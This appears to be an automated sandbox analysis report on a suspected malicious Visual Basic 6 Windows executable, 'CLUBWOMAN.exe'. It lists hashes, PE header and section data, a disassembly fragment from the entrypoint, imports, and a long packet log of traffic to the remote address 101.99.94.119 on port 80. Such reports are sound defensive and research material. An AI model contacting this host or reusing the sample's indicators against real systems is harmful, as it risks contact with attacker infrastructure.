SHA512:	ecf0b711c41619dcf9073f1cd4c769cc106b04aaec40881fc11cbf8686989da512a9c2ee2683a90b99dddb1f4a762cf4df512663519bc9035bbc6d0fd90f9571
SSDEEP:	1536:BUS3/zw2m3c39SYeXvmgU2sIMflWub4cL51tY4SQmiPYElZ943ckw2mUS3/:BT/zM3c3bcBsIMfQuDaSZS3ckYT/
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....(.U.................@..........D........P....@................

File Icon


Icon Hash:	d5d5959595959595

Static PE Info

General
Entrypoint:	0x401144
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x558D28E4 [Fri Jun 26 10:26:44 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5565993a5a9f2bfb76f28ab304be6bc1

Entrypoint Preview

Instruction
push 00406B44h
call 00007F9040EB35D5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ch, dh
pop ss
clc
pop edx
push B944FDC7h
mov ebx, 52105E67h
cmp edx, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc edx
add byte ptr [esi], al
push eax
add dword ptr [ecx], 53h
inc ebp
inc ebx
inc ebp
push ebx
push ebx
dec ecx
dec edi
dec esi
inc ecx
dec esp
dec ecx
push ebx
push esp
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
pop es
jo 00007F9040EB3614h
inc edx
sub cl, ah
imul eax, dword ptr [eax+41h], 81h
or bl, byte ptr [ebx-03CA9598h]
mov esi, 05B7FAFFh
or dl, byte ptr [ebp-48h]
inc esi
mov cl, 74h
and dword ptr [ecx], ecx
jbe 00007F9040EB356Ah
jnle 00007F9040EB35F1h
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push esp
pop ecx
add byte ptr [eax], al
sub al, 58h
add byte ptr [eax], al
add byte ptr [ecx], dl
add byte ptr [ebx+4Bh], dl
push edx
dec ebp
dec ecx
dec esi
inc esp
inc esp
inc ebp
dec esp
dec ecx
dec esi
inc edi
inc ebp
push edx
dec esi
inc ebp
add byte ptr [00000001h], cl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14b64	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x5b92	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x7c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13de4	0x14000	False	0.648803710938	data	7.05513425915	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0x115c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17000	0x5b92	0x6000	False	0.545776367188	data	6.0293757353	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1bcea	0xea8	data
RT_ICON	0x1b442	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 532795385, next used block 536862194
RT_ICON	0x1aeda	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x18932	0x25a8	data
RT_ICON	0x1788a	0x10a8	data
RT_ICON	0x17422	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x173c8	0x5a	data
RT_VERSION	0x171e0	0x1e8	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp

Version Infos

Description	Data
Translation	0x0404 0x04b0
ProductVersion	1.00
InternalName	CLUBWOMAN
FileVersion	1.00
OriginalFilename	CLUBWOMAN.exe
ProductName	REFOUNDING

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 09:52:02.509993076 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.554785967 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.554905891 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.599960089 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.600111008 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.647567034 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.647619009 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.647640944 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.647659063 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.647680044 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.647818089 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.694133997 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694166899 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694184065 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694204092 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694253922 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694274902 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694294930 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694318056 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694372892 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.694441080 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.743522882 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743558884 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743583918 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743613005 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743634939 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743655920 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743676901 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743699074 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743721008 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743742943 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743767977 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743789911 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743813038 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743833065 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743854046 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743875980 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.745096922 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.790580988 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790736914 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790760040 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790779114 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790800095 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790815115 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790817976 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.790831089 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790852070 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790873051 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790884018 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.790891886 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790911913 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790936947 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790947914 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.790960073 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790982008 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790997028 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.791003942 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.791019917 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.791030884 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.791043997 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.791065931 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.791078091 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.791088104 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.791102886 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.791110992 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.791138887 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.791165113 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.839260101 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839301109 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839318037 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839340925 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839361906 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839384079 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839407921 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839432001 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839456081 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839478970 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839503050 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839524031 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839545965 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839570045 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839596033 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839618921 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839639902 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839663982 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839685917 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839709044 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839730978 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839752913 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839778900 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839802980 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839827061 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839850903 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839874029 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839896917 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839917898 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.841974020 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.842142105 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.842166901 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.842551947 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.842581987 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.842597961 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.842633009 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.842655897 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.842675924 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.842695951 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.842715979 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.842735052 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.846889973 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.887871027 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.887917995 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.887943029 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.887964964 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.887989044 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888015032 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888035059 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888039112 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888071060 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888096094 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888114929 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888132095 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888156891 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888156891 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888159990 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888183117 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888183117 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888206959 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888206959 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888231993 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888236046 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888256073 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888258934 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888284922 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888288021 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888310909 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888319969 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888336897 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888359070 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888361931 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888386011 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888395071 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888411999 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888420105 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888437986 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888458014 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888463974 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888489962 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888490915 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888516903 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888518095 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888541937 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888542891 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888569117 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888570070 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888592005 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888592958 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888616085 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888617039 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888638020 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888639927 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888659000 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888669014 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888686895 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888700008 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888712883 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888721943 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888736010 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888746023 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888761044 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.888771057 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.888814926 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.891968012 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.892007113 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.892030001 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.892050982 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.892071962 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.892093897 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.892113924 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.892138958 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.892153025 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.892163992 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.892188072 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.892210007 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.892234087 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.892236948 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.892257929 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.892258883 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.892288923 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.892332077 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.936501980 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936551094 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936578035 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936604023 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936629057 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936654091 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936665058 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.936678886 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936702013 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.936706066 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936737061 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936744928 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.936764956 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936788082 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.936790943 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936816931 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936830044 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.936842918 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936856031 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.936868906 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936892986 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.936894894 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936920881 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936923027 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.936947107 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.936952114 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.936978102 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.936980009 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937005043 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937007904 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937027931 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937033892 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937055111 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937061071 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937079906 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937088013 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937098026 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937114954 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937124014 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937135935 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937149048 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937165022 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937174082 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937191010 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937212944 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937216997 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937238932 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937243938 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937267065 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937272072 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937298059 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937304020 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937325001 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937325954 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937350035 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937350988 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937375069 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937377930 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937403917 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937426090 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937428951 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937433004 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937453985 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937465906 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937479973 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.937491894 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.937534094 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.939178944 CEST	80	49732	101.99.94.119	192.168.2.3
